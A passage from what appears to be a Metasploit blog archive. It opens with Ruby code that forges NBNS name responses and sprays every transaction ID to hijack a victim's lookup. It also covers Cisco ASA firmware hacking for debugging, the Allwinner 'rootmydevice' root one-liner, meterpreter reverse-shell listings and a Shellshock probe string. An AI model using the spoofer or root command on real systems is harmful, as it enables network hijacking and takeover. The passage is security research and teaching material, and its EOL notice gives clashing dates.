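  [txid, 0x0110, 1, 0, 0, 0].pack('n6') + nbns_wire_name(name, suffix) + [0x0020, 0x0001].pack('nn')
end

# Positive name query response: header, answer RR, TTL, RDLENGTH 6,
# NB_FLAGS (B-node, unique) and the IPv4 address we want the victim to use.
def build_nbns_response(txid, name, ip, suffix: 0x00, ttl: 165)
  header = [txid, 0x8500, 0, 1, 0, 0].pack('n6')
  rdata  = [0x0000].pack('n') + ip.split('.').map(&:to_i).pack('C4')
  header + nbns_wire_name(name, suffix) + [0x0020, 0x0001, ttl, rdata.bytesize].pack('nnNn') + rdata
end

# On-subnet case: we saw the broadcast, so answer with its own transaction id.
def parse_nbns_query(pkt)
  return nil if pkt.bytesize < 50
  txid, flags, qdcount = pkt.unpack('nnn')
  return nil unless qdcount == 1 && (flags & 0x8000).zero? && pkt.getbyte(12) == 0x20
  name, suffix = decode_netbios_name(pkt[13, 32])
  { txid: txid, name: name, suffix: suffix }
end

def answer_query(pkt, ip)
  q = parse_nbns_query(pkt)
  q && build_nbns_response(q[:txid], q[:name], ip, suffix: q[:suffix])
end

# Off-subnet case: the query is invisible, so send a response for each of the
# 65536 possible transaction ids; one of them will match the victim's pending
# lookup. Returns the number of packets handed to +send+.
def spray_nbns_responses(name, ip, send:, suffix: 0x00)
  (0..0xffff).each { |txid| send.call(build_nbns_response(txid, name, ip, suffix: suffix)) }
  0x10000
end
```

The blind case is cheap precisely because the search space is the 16-bit transaction ID and nothing else: a complete sweep is 65536 datagrams of 62 bytes, about 4 MB, which is why a few seconds of spraying is enough when the victim is looking up a predictable name like WPAD.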


Have fun storming the castle.


Chained exploits


Nagios is a nifty monitoring tool that has basically become the defacto standard. They also produce a proprietary commercial frontend called Nagios XI. That frontend has a SQL injection vuln that can lead to authentication bypass. The bypass gives you access to a command injection. The command injection lets you run sudo without a password. Nothing but net.


Expect a more detailed write up on this one.


New Modules


Exploit modules (6 new)

Auxiliary and post modules (5 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.7...4.12.11


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Rapid7 announced the end of life of Metasploit Pro 32-bit versions for both Windows and Linux operating systems on July 5th, 2017. This announcement applies to all editions: Metasploit Pro, Metasploit Express and Metasploit Community. After this date, Metasploit 32-bit platforms will not receive product or content updates. Metasploit Framework will continue to provide installers and updates for the 32-bit versions.


End-of-life announcement date (July 5th, 2016): The date that the end-of-life date has been announced to the general public.

Last date of support (July 5th, 2017): The last date to receive service and support for the product. After this date, all support services for the product are unavailable, and the product becomes obsolete.

Last date of available installers (July 5th, 2016): The last date Rapid7 will generate 32-bit installers. After this date, Rapid7 will continue to provide updates until the last date of support.



Product Migrations

Customers are encouraged to migrate to the Metasploit 64-bit versions of the product; installation files can be found at the following link. When upgrading to there may be changes to system requirements, including memory; please review the System requirements to see whether your current system meets the minimum requirements. To migrate to a newer platform, create a platform-independent backup and restore it on the new system; steps for migration can be found here.


More Information


For Metasploit Pro and Express customers, contact or your account manager for assistance.


For Metasploit Community customers, submit your inquiries to the community discussion forum.


For more information about Rapid7 End-Of-Life Policy, go to:


Weekly Metasploit Wrapup

Posted by egypt Employee Jun 16, 2016

Steal all the passwords


I talk a lot about Authenticated Code Execution, but of course that's not the only thing that authenticated access can get you. This week's update comes with a couple of modules for using known credentials to extract more credentials. The first is for Symantec Brightmail, an email filtering gateway that comes with a management interface for administrators. Any account with read access is allowed to look at the encrypted LDAP credentials stored in Brightmail. Fortunately for us, the encryption is reversible and the system also kindly uses a known key. The second module is for Canon multi-function printers, because of course your printer needs to store a bunch of plaintext passwords; I mean, why wouldn't it? This one also requires authentication, but it's a printer, so of course there's a default that no one ever changes.


Payload options in jobs output


To see the stuff running in the background, msfconsole has a jobs command. There are some pertinent pieces of info you usually want to see in that display, but a console interface makes it kinda tough to view it all because of the limited column width. A recent feature, the ability to control the URI a reverse_http payload calls back to with the LURI option, puts extra pressure on that limited space. To make that a little easier, payload options are now all condensed into a single column, so instead of separate LPORT, LHOST, and LURI columns, you just have "Payload opts":



msf exploit(ie_cbutton_uaf) > jobs


  Id  Name                                       Payload                           Payload opts
  --  ----                                       -------                           ------------
  0   Exploit: windows/browser/adobe_flash_pcre  windows/meterpreter/reverse_http
  1   Exploit: windows/browser/ie_cbutton_uaf    windows/meterpreter/reverse_tcp   tcp://

msf exploit(ie_cbutton_uaf) > jobs -v


  Id  Name                                       Payload                           Payload opts                     URIPATH   Start Time                 Handler opts
  --  ----                                       -------                           ------------                     -------   ----------                 ------------
  0   Exploit: windows/browser/adobe_flash_pcre  windows/meterpreter/reverse_http  /flash    2016-06-16 13:50:31 -0500
  1   Exploit: windows/browser/ie_cbutton_uaf    windows/meterpreter/reverse_tcp   tcp://             /cbutton  2016-06-16 13:51:00 -0500 


Gifts that keep on giving

Shellshock is one of my favorite bugs of all time. It's simple to exploit, results in RCE, and is in a thing that everyone takes for granted. The latest incarnation of it is in IPFire, an open source Linux firewall, but I'm sure we'll see it again.
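Because Shellshock keeps resurfacing in web-facing CGI wrappers, the detection side is worth having on hand. The block below is an added example, not part of this post or of Metasploit: a scanner for combined-format access logs that URL-decodes the request line, Referer and User-Agent and flags the bash function-definition prefix `() {` that every Shellshock variant begins with. The log lines are constructed for the example and the payload in them is the harmless classic probe.

```python
import re
from urllib.parse import unquote

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A Shellshock payload is a bash function definition at the start of an environment
# value: "() {" followed by a body.  Whitespace between the parens and brace varies.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def scan_access_log(lines):
    """Return one finding per (line, field) whose decoded value carries the prefix."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would count these
        for field in ("request", "referer", "ua"):
            value = unquote(m.group(field))  # attackers often percent-encode the probe
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "value": value,
                    "cgi": "/cgi-bin/" in m.group("request"),  # higher confidence when a CGI path
                })
    return findings

SAMPLE_LOG = [  # constructed lines; IPs are documentation ranges
    '10.0.0.5 - - [16/Jun/2016:13:50:31 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Jun/2016:13:51:00 -0500] "GET /cgi-bin/status HTTP/1.1" 200 17 "-" '
    '"() { :; }; echo shellshock-test"',
    '198.51.100.9 - - [16/Jun/2016:13:52:10 -0500] "GET /cgi-bin/status HTTP/1.1" 500 0 '
    '"%28%29%20%7B%20%3A%3B%7D%3B%20echo%20x" "curl/7.47"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['field']} cgi={f['cgi']}: {f['value']}")
```

Decoding before matching is the important part: the third sample line would slip past a literal string match, and a web server that passes the raw header to the CGI environment still hands bash a function definition once the application decodes it.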


New Modules


Exploit modules (6 new)

Auxiliary and post modules (4 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.5...4.12.7


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Back in February, Exodus Intelligence released their blog entry titled "Execute My Packet", which detailed their discovery and exploitation of CVE-2016-1287.  Since then, I've fielded numerous requests for modules and witnessed much discussion generated from it.  From this discussion, I've gathered that many researchers seem to consider the Cisco ASA as an unruly beast, difficult to approach, even harder to tame.  I feel that this is far from the truth, and this article is a response to such notions.


We attempted a module and stopped.  Before explaining why, some disclosures may be in order: while I wasn't on this project with David or Jordan, I actually worked at Exodus Intelligence during the discovery of this vulnerability and the initial exploitation attempts.  Jordan's original exploit, which the public has seen, is impressive in itself, though not portable across ASAs due to loss of heap determinism given variances in device configurations.  I'm positive that given more time, he would have found an information leak necessary to circumvent that.  Unfortunately, both he and I left Exodus before the disclosure of the bug, so I can't comment on the decision to release it in such a state.


Since the initial disclosure, I’ve worked both with him and independently to find a fruitful memory disclosure, but to no avail.  Given enough time, I'm sure it would come about, but the bug is patched.  Releasing a module now that could be used to compromise one's own personal device running an outdated software release feels like a wasted effort at best.  Rather, with the aforementioned questions and discussions in mind, I felt that more value would be had in using this as a teaching opportunity.  Much of this article will be old hat to many of you, but on that note, you aren't the intended audience.


While some people appear to almost fear the ASA, and embedded reverse-engineering in general, I'd argue that this is simply because it is an unknown.  I believe this is actually an extremely good way to get one's feet wet in the field.  The ASA runs on a common architecture, can be had with a valid license relatively cheap, and requires no electronics knowledge to begin picking apart.  Any bugs you may eventually find could prove rather valuable.  How much better could it be?


First Steps

The first step in all of this obviously involves setting up a research environment.  Though other, cheaper options do exist, by far the easiest approach to this is purchasing an ASA.  The other options include possibly using the ASA virtual appliance (which I have not investigated at all), or virtualization of the system software via other means.  I did attempt getting it running inside of QEMU, but the amount of work required to succeed when all you want to do is debug is quite daunting, so I went with a physical device.  In a town where tech startups crash and burn every day, obtaining a used ASA on Craigslist is infinitely easier and cheaper when considering how much your time is worth.  For those of you so inclined, many Cisco certification seekers have formed a community centered around the effort to emulate the software within QEMU and GNS3.  Patches, scripts aimed at both packing and unpacking images, and hacked binaries exist for several older versions; however, there was none available at the time of writing for the vulnerable release.  Google is your friend!


On the hardware end, if you do end up getting an actual ASA, be sure to upgrade the RAM if it's operating with anything less than 256MB.  Debugging via the serial console is slow, and you'll likely be rebooting the device a lot.  You definitely want to eliminate any bottlenecks that you can before you begin.  Cisco sold branded memory for the device at quite a premium, which is guaranteed to work.  I myself decided to risk $12 on a 1GB PC-3200 184 pin DIMM from Fry's that looked as if a small animal had been using the packaging as a chew toy.  So far it has worked flawlessly.  YMMV.  As for the serial connection, I use and recommend Parallax's USB to RS-232 adapter.


Platform Overview




My bookshelf is lined with tomes such as Compilers (the classic "dragon book"), Windows NT Device Driver Development, Inside OLE, and many other equally thick books.  I am all for rigorous academic discourses on various topics when the situation calls for it.  This is not such a situation.  I feel that reverse engineering is often more about knowing what you need to ignore than trying to know everything one possibly can.  That said, I'm going to gloss over a lot of details which are well defined elsewhere.  For our purposes, I believe the salient points that require focus are as follows:


  • The Cisco ASA 5505 is a tiny computer
  • It's x86
  • It has a lot of network interfaces
  • It has a removable CF card which contains the firmware image
  • It runs Linux
  • The system boot sequence involves traversing through the BIOS, ROMMON (ROM Monitor, Cisco's bootstrap program available on this and other devices), GRUB, and off into Linux land which ends by loading the lina binary, which we will speak more of later.  The boot sequence is important because in order to do what we want, we have to hijack it.


Armed with this knowledge and a Cisco ASA 5505 in either its physical or virtual manifestation, we're ready to get started.


Un-nesting the Matryoshka Dolls


The next step in our progression is to get setup for debugging.  Thankfully, Cisco was kind enough to include gdbserver on the firmware image, but for some unknown reason, they didn't make access to it very straightforward.  "Jailbreaks" from the CLI in earlier releases have been accomplished by unpacking the firmware, editing some script or another to start /bin/sh, repacking the firmware, and hoping that you didn't screw up somewhere along the line.  You can find details regarding techniques such as these in the excellent presentation "Breaking Bricks and Plumbing Tips" by Alec Stuart-Muirk.  (Alec's presentation is actually really, really good.  You should definitely check it out after reading this)


As I mentioned earlier, shell scripts and techniques for unpacking and repacking the firmware exist online, albeit not publicly for version 9.2.4.  While I won't link them, they are worth investigating for educational purposes, as the same general approach can be used for reversing firmware for other devices.  'xxd', 'dd', a keen mind, and a little experience are all that are truly required.  I recommend you also check out devttys0's excellent tool binwalk, as it can simplify much of the process for you.


I had originally intended to extract and repack the firmware myself, but after bouncing around ideas with David Barksdale, he provided me with an alternative: a zen-like, that's-so-stupid-why-didn't-I-think-of-that offset.  Assuming you have a copy of the vulnerable ASA firmware (asa924-k8.bin), open the file in your favorite hex editor.  From there, proceed to offset 0x1d1a03c.  You should see something like




This certainly looks relevant to our interests, almost like it might be Linux kernel boot parameters or something.  I wonder what would happen if we used a clever 1994-era trick and overwrote some of these options with something like:





Save the file as something like asa924-k8-hax.bin


Once we have our modified image, we can transfer it to our device using one of a few methods, such as via TFTP from the ROMMON interface, or writing it to the CF card.  I had one laying around, so I went the card writer route.  With the CF card mounted in the OS of your choice, you can simply copy the file to the top level directory.  The TFTP process is fairly simple and well documented in the product manuals, so there's no need to run out and buy one if you're lacking such.


This project helped justify Brent's obsession with hoarding archaic historical relics



When you see “Use BREAK or ESC to interrupt boot”, do exactly as it says, and you should end up with something quite similar:




From the ROMMON prompt, we can force the device to load our firmware by using


boot disk0:/asa924-k8-hax.bin


Hit enter and be patient.  The boot time is excruciatingly slow in this age of NVMe SSDs.  Before too long, you should see something like this:




Score.  We're in.  Before getting too excited, realize that having a standard shell on an ASA is not too terribly useful, but it is a crucial step towards our end goal.  Typically, the first step one takes in auditing a product for bugs is to identify and enumerate the attack surface, i.e., all of the inputs to the system.  In other words, where will it let you shove a bunch of A's into it.  Cisco has simplified this process for us by cramming nearly all functionality that makes an ASA more useful than a decked out Raspberry Pi into one place: the lina process.  At least in my experience, and apart from the WebVPN interface which I have not investigated, nearly all packet filtering, QoS, and protocol capabilities, among others, are handled by this process.  There may be some other binaries I've overlooked, but lina is large and complex enough to keep one busy for a long time.


With the boot sequence hijacked, we need to find a way to cleanly start lina under gdbserver.  Fortunately, a little 'sed' goes a long way towards that end:


sed -i 's/#\(.*-g -d.*\)/\1/' /asa/scripts/rcS
sed -i 's|-g -d|-g -s /dev/ttyS0 -d|' /asa/scripts/rcS
exec /sbin/init


Without explaining in minute detail, these two sed commands basically edit the flags for lina in /asa/scripts/rcS, setting it to execute in debug mode on the serial console.  After executing the real init process with the last line, if everything went according to plan, you should soon see a screen such as this:




Finally!  You might think we're done at this point, and you wouldn't be foolish to assume so despite the fact that you'd be wrong.  From here it follows that one should be able to debug the lina process by connecting gdb over the serial line.  This is true save for one final hurdle.  The application includes a watch dog mechanism that will reboot the system should the process fail to respond to polling within a given time limit.  This is great news for those who want redundancy in their SOHO networking hardware, and bad news for those who want to take their sweet time investigating the machine state from the confines of gdb.  I considered this as a stopping point for this article, but I'm feeling generous.  Consider the following:




And consider the first few lines of my .gdbinit


set disassembly-flavor intel
target remote /dev/ttyUSB1
set *0x0A53F168=0
file ~/lina


This should get you going.  The proof of why it works is left as an exercise to the reader.


Where Do We Go From Here?


Bug hunting on this platform is our ultimate goal, but I feel the actual process of such is tangential to the aims of this article.  Still, I feel the need to offer a few pointers.  Before anything else, as soon as you are able to pull the lina binary from the file system, go ahead and begin processing it in your favorite disassembler whether you plan to statically audit code right away or not.  Remember how I said that Cisco packed nearly, if not all, functionality of the ASA into one binary?  Yeah, it's huge.  I believe it took about 2 hours in IDA Pro on my MacBook, and a little less on my PC.  In any case, it was enough time to go have a cup of coffee or four.


With regards to the Cisco heap allocator and heap exploitation in general, I never thought I'd live to hear the question "What is Doug Lea's malloc?" - and this coming from people who I feel have a decent handle on more modern implementations such as the Windows Low Fragmentation Heap.  It seems a bit like learning Riemann Sums before mastering elementary algebra.  Still, I suppose it's entirely possible and becoming more commonplace as time marches on.  If you're already familiar with a more modern allocator, that's great, dlmalloc should be easy for you to pick up.  And if you're going to be doing vulnerability research on embedded devices, you definitely should pick it up.  While modern desktop operating systems have long since abandoned dlmalloc in favor of more robust solutions, variations of it pop up frequently in embedded systems given that it's simple and relatively efficient.  The most concise overview I can think to recommend would be the excellent "Once upon a free()... " written by the all-knowing anonymous and published in Phrack 57, article 0x09.  Exodus Intelligence's original report features an excellent write up on the proprietary changes Cisco built on top of dlmalloc, so I defer all vendor specific heap questions to their blog post.


Finally, for any of you asking "ok, how do I find bugs?", I'll leave you with this: you probably already know how.  If you're reading this and truly don't know where to start, I'd recommend reading the "Binary Auditing" chapter of "The Shellcoder's Handbook" or any of the innumerable references on fuzzing.  While it's true that spotting vulnerabilities takes some intuition, I believe that intuition can be learned.  There are no silver bullets.  The biggest hurdle is taking the time to do it.  That said, I certainly feel a future blog post specifically on this subject may be in order.  Happy hunting!


Special thanks to:

    Jordan Gruskovnjak of Crowdstrike (@jgrusko) - my empathetic sounding board who understands the agony of crashing and rebooting an ASA 12+ hours a day.

    David Barksdale - who admirably has less of an online presence than I do

    Brent Cook and everyone on the Metasploit team: proofreading and moral support



Execute My Packet (Exodus Intelligence blog post on CVE-2016-1287)

Breaking Bricks and Plumbing Tips, Alec Stuart-Muirk (PDF)

Once Upon a free()..., Phrack Magazine, issue 57, article 0x09

The Shellcoder's Handbook: Discovering and Exploiting Security Holes (ISBN 9780470080238)

Binwalk | Firmware Analysis Tool

New Modules



First up this week, we have a new module from rastating which exploits an unauthenticated file upload vulnerability in the popular WordPress plugin, Ninja Forms.  Versions affected include those within the range of v2.9.36 to 2.9.42, and the vulnerability can be leveraged into a shell running within the security context of the web server process in a fairly silent manner.  With over 2.5 million downloads and 500k active installs, according to the developer and the Wordpress plugin repos, this silent attack could prove deadly ... sort of like a ninja ... get it?


New from @wvu is a module exploiting a recently discovered pre-auth file upload vulnerability in Ubiquiti Network's airOS, which runs on their airMAX line of devices.   Given the ease with which the module turns a file upload exploit into a privileged BusyBox shell, we recommend that affected users check with the vendor for software updates.


Also new from @wvu (he's been busy) is an exploit module targeting Oracle Application Testing Suite version  The software allows users to perform load and regression testing--among other useful features--on their web applications. Unfortunately, this version also opens a wide security hole that an attacker can easily turn into a connect-back JSP shell.  While Oracle's applications are sometimes derided as being both complex and demanding to install, the Metasploit module couldn't be easier to use.  Simply point it at the vulnerable target, allow it a moment to attempt cleaning off any exploit artifacts, and wait for your shell.  It's just that easy!


Totally wrecking the whole pre-auth file upload theme we had going ...


h00die <mike [at]> recently contributed a module for a local privilege escalation vulnerability in the 3.4 legacy kernel from Allwinner (the maker of some really cool embedded devices).  Kernel-land vulnerabilities and exploits are often thought of as being quite complex, esoteric, and daunting to approach by many researchers.  Allwinner has heard these sentiments and made accommodations for all those in agreement.  To exploit, type:


echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

and you're done!  Or, simply fire up the module by h00die and forgo the rigorous echo command.  Granted, there is a good chance that this was implemented as a crutch for development and testing with perfectly altruistic intentions, but it's certainly not something you'd want to leave running on any multiuser system where you'd hope to maintain productivity.  New Armbian images were released on May 1st to address this issue, and we recommend that users look into upgrading as soon as possible.


Bug Fixes


A nasty bug existed when attempting to upgrade the python/shell_reverse_tcp_ssl payload: send() was not sending all of the necessary protocol data over the connection, causing frequent EOF errors.  The fix was contributed by geckom and remedies the issue by using sendall().
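The bug comes down to the contract of send(): it writes as much as the kernel will take right now and returns that count, which can be far less than what you passed in. The block below is an added example, not the payload's own code or anything from Metasploit: it provokes a partial write on a socketpair, then shows the loop that sendall() performs for you, with a reader on the other end to confirm every byte arrived. The payload size is chosen to exceed any default socket buffer.

```python
import socket
import threading

PAYLOAD_SIZE = 16 << 20  # 16 MiB, far larger than a default socket send buffer

def partial_send(payload):
    """send() contract: it may write only part of the buffer and returns how much it wrote.
    A fresh non-blocking socket accepts one buffer's worth and returns that count."""
    a, b = socket.socketpair()
    a.setblocking(False)
    try:
        return a.send(payload)
    finally:
        a.close()
        b.close()

def send_all(sock, data):
    """Keep calling send() until every byte is out.  socket.sendall() does exactly this;
    the loop is written out so the fix is visible."""
    view = memoryview(data)
    total = 0
    while total < len(view):
        n = sock.send(view[total:])
        if n == 0:
            raise ConnectionError("peer closed while writing")
        total += n
    return total

def reliable_transfer(payload):
    """Send payload over a blocking socketpair while a thread drains the other end.
    Returns (bytes sent, whether the receiver got an identical copy)."""
    a, b = socket.socketpair()
    received = bytearray()

    def drain():
        while True:
            chunk = b.recv(1 << 16)
            if not chunk:   # EOF once the writer closes
                break
            received.extend(chunk)

    t = threading.Thread(target=drain)
    t.start()
    try:
        sent = send_all(a, payload)
    finally:
        a.close()
    t.join()
    b.close()
    return sent, bytes(received) == payload

if __name__ == "__main__":
    n = partial_send(b"x" * PAYLOAD_SIZE)
    print(f"send() accepted {n} of {PAYLOAD_SIZE} bytes")
    sent, ok = reliable_transfer(b"y" * PAYLOAD_SIZE)
    print(f"send_all() wrote {sent} bytes, receiver matched: {ok}")
```

On a TLS-wrapped socket the same rule applies, which is why a stager that writes its protocol header with a single send() and then waits for the reply sees an EOF instead: the peer never received the whole message it was waiting on.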


jhart squashed a couple of bugs and performed some maintenance within the ssh_identify_pubkeys auxiliary module.  For one, both KEY_DIR and KEY_PATH would not expand if they contained symbolic values (such as ~/bobbobthebobbob/.ssh/bobskeys.txt).  Secondly, if the key included a whitelist of commands that the user could run, it wouldn't be processed at all.  Finally, several unused options and some dead code snippets were removed from the module, which has now been tested and confirmed to work properly.
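Both of those bugs are about the authorized_keys line format rather than SSH itself: paths with `~` have to be expanded before they are opened, and a key line may start with a comma-separated option list (`command="..."`, `from="..."`, `no-pty`) in which quoted values can themselves contain commas and spaces. The following is an added example, not the module's code: a small parser for that format, with a constructed fake ed25519 blob (all 0x01 bytes, not a real key) so the sample line round-trips.

```python
import base64
import os
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")

def expand_key_path(path):
    """Expand ~ and $VARS the way a shell would, so ~/bob/.ssh/keys.txt resolves."""
    return os.path.expandvars(os.path.expanduser(path))

def _split_options(text):
    """Split a comma-separated option list, honouring double-quoted values."""
    items, cur, quoted, i = [], [], False, 0
    while i < len(text):
        c = text[i]
        if c == "\\" and quoted and i + 1 < len(text):
            cur.append(text[i + 1])   # keep the escaped character, drop the backslash
            i += 2
            continue
        if c == '"':
            quoted = not quoted
        elif c == "," and not quoted:
            items.append("".join(cur))
            cur = []
            i += 1
            continue
        cur.append(c)
        i += 1
    if cur:
        items.append("".join(cur))
    return items

def parse_authorized_key(line):
    """Return {options, type, blob, comment} for one authorized_keys line, or None."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    options = {}
    if not line.startswith(KEY_TYPE_PREFIXES):
        # options run up to the first whitespace that is outside double quotes
        i, quoted = 0, False
        while i < len(line):
            c = line[i]
            if c == "\\" and quoted:
                i += 2
                continue
            if c == '"':
                quoted = not quoted
            elif c in " \t" and not quoted:
                break
            i += 1
        for item in _split_options(line[:i]):
            key, sep, value = item.partition("=")
            if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
                value = value[1:-1]
            options[key] = value if sep else True   # flag options like no-pty carry no value
        line = line[i:].lstrip()
    parts = line.split(None, 2)
    if len(parts) < 2:
        raise ValueError("line lacks key type or key data")
    ktype, b64 = parts[0], parts[1]
    comment = parts[2] if len(parts) == 3 else ""
    blob = base64.b64decode(b64, validate=True)
    (n,) = struct.unpack("!I", blob[:4])   # the blob opens with a string repeating the key type
    if blob[4:4 + n] != ktype.encode():
        raise ValueError("key type in text does not match key blob")
    return {"options": options, "type": ktype, "blob": blob, "comment": comment}

def _ssh_string(b):
    return struct.pack("!I", len(b)) + b

# Constructed fake key material so the sample line parses; this is not a usable key.
FAKE_KEY_B64 = base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(b"\x01" * 32)).decode()
SAMPLE_LINE = ('command="/usr/bin/backup --verify",no-pty,from="192.0.2.0/24,10.0.0.1" '
               f"ssh-ed25519 {FAKE_KEY_B64} backup@host")

if __name__ == "__main__":
    print(parse_authorized_key(SAMPLE_LINE)["options"])
    print(expand_key_path("~/bobbobthebobbob/.ssh/bobskeys.txt"))
```

A naive `line.split()` on the sample line would hand you `command="/usr/bin/backup` as the key type, which is the shape of failure the module hit: a line with a command whitelist was simply not recognised as a key.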


Our own Brent Cook (@busterbcook) tidied up and merged changes, originally contributed by RageLtMan, to the reverse_tcp_rc4 and bind_tcp_rc4 payloads.  This removes the static shellcode originally contained within the payload modules and implements them as assembly which is then compiled by Metasm.  Brent also squashed bugs found by @_sinn3r while auditing module ms08_067_netapi, which later proved to affect many more modules.  This fixes issues where the 'check' command would erroneously report that a host was vulnerable when in fact it wasn't, and also allows for correctly checking a range of IP addresses (as in 'check').  Not content to stop there, Brent also corrected an issue in the BrowserAutoPwn2 server where the CookieExpiration variable was not being set correctly.  Finally, in other bugfix news not involving Brent, darkbushido worked in changes to msfvenom which fix an issue where it would still generate a payload even if it was larger than the size option.  It also no longer fails silently when invalid payload options (such as an ELF file for OS X) are specified.


Weekly Metasploit Wrapup

Posted by egypt Employee May 20, 2016

Check the computer, the mainframe computer


This week's update comes with our first ever exploit module for z/OS, the operating system used by mainframes, from our friend Bigendian Smalls who also built the payloads. The module in question is an example of authenticated code execution by design, which takes advantage of a design feature allowing users to submit jobs via uploading files to an FTP daemon.


So all we have to do is load it anywhere into the credit union mainframe, and it'll do the rest.


More movie hacking


Also this week, we have a module straight out of the movies. Long-time contributor nstarke brings us another fun RCE-by-design exploit, this time for a TP-Link surveillance camera. From a network perspective it's just another embedded Linux system, of course, but having root on one of these things means you can potentially steal surveillance video or even replace the feed with old benign images while you steal those diamonds from under the nose of that hapless security guard.


Operations center with video surveillance monitors



Documenting modules


Our friendly neighborhood exploit dev, sinn3r, recently put together a really handy system for writing module documentation in markdown. I haven't mentioned it in a Wrapup yet because I'm working on a bigger announcement, but for now it will suffice to say that markdown docs are super fun and easy to write, and that figuring out how a module is supposed to work has never been easier. From msfconsole, just type info -d and you'll get the full knowledge base for the given module.


We've already added supporting documentation for several modules, including the new mainframe exploit module mentioned above. If you've ever wanted to contribute, but don't feel like you want to write code, this is a great place to get started.


New Modules


Exploit modules (3 new)



Auxiliary and post modules (2 new)

Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.26...4.12.2


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.


Weekly Metasploit Wrapup

Posted by egypt Employee May 11, 2016

Resolve, v. transitive


Sometimes the biggest things that make working with a tool fun are the small things. One of those things is the recent addition of a resolve command for Meterpreter. It does what it sounds like: it resolves a hostname to an IP address on the victim system, taking advantage of the local DNS. Of course, that's not a huge thing, but it is pretty convenient.


Strut, v. intransitive


This update also comes with a fun exploit for Apache Struts, a web framework for webby things. It's a Model-View-Controller framework for Java web applications, somewhat similar to Rails in the Ruby world. Bugs in frameworks like this can end up lasting a lot longer than in applications, as all the things that depend on it have to be updated too.


Magick, n.


Also in this update is a shiny new exploit module for the latest Branded Vulnerability(tm), ImageTragick. In this case though, it can actually get you shells. As the advisory explains, this is a command injection vulnerability in the way image metadata is passed to a conversion utility. It's tough to gauge how useful this will be since it depends a lot on how applications use ImageMagick, but the potential is pretty shiny. If you've found something that uses it in a vulnerable way, it sure would be keen if you'd let us know and even more awesome would be a module for it in a new Pull Request.
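Since the impact depends on how an application hands files to ImageMagick, the practical defences are on the application side: make sure the bytes of an upload actually match the image type the filename claims (ImageMagick chooses its coder from content, so a ".png" that is really MVG text is decoded as MVG), and audit policy.xml to confirm the risky coders are denied. The block below is an added example, not ImageMagick's or Metasploit's code; the list of coder patterns is the set that circulated as the ImageTragick mitigation and should be treated as a starting point, and the sample uploads and policies are constructed.

```python
import xml.etree.ElementTree as ET

# Magic bytes for the raster formats an upload form usually claims to accept
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Coders the ImageTragick mitigation singled out for rights="none" (assumed list)
RISKY_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"}

def upload_is_plausible(filename, data):
    """Accept only when the declared extension is allowed and the bytes carry its magic."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magics = MAGIC.get(ext)
    if not magics:
        return False, f"extension {ext!r} not on the allow list"
    if not any(data.startswith(m) for m in magics):
        return False, f"content does not start with {ext} magic bytes"
    return True, "ok"

def missing_coder_denials(policy_xml):
    """Return the risky coders that a policy.xml does NOT deny."""
    root = ET.fromstring(policy_xml)
    denied = {p.get("pattern") for p in root.iter("policy")
              if p.get("domain") == "coder" and p.get("rights") == "none"}
    return RISKY_CODERS - denied

# constructed policies: the first has no coder restrictions at all
WEAK_POLICY = "<policymap></policymap>"
HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>"""

# constructed sample uploads: a real PNG header and an MVG drawing script named .png
REAL_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
FAKE_PNG = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"

if __name__ == "__main__":
    print(upload_is_plausible("cat.png", REAL_PNG))
    print(upload_is_plausible("cat.png", FAKE_PNG))
    print("weak policy leaves enabled:", sorted(missing_coder_denials(WEAK_POLICY)))
    print("hardened policy leaves enabled:", sorted(missing_coder_denials(HARDENED_POLICY)))
```

The magic check is deliberately strict rather than a content sniffer: anything that does not begin with the bytes of an allowed raster format is refused before it reaches the converter, which is the cheapest way to keep text-based coders out of the upload path regardless of what policy.xml says.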


Committer, n.


In great open-source-land news, we've added a new committer! As Tod mentioned the last time this happened, new committers don't come along very often and when they do it's usually surprising to learn that they aren't already committers because they've been around for quite a while. Mubix has been a long-time friend of the Metasploit family, helping out with code review, module development, and lots of testing. He has also helped countless people learn about Metasploit features with his fabulous Metasploit Minute series with Hak5.


The open source community has always been integral to Metasploit. Adding new Committers increases the Bus Factor of the project. Non-Rapid7 Committers are super important for the vitality of the project and help cement the relationship between Rapid7 and the community.


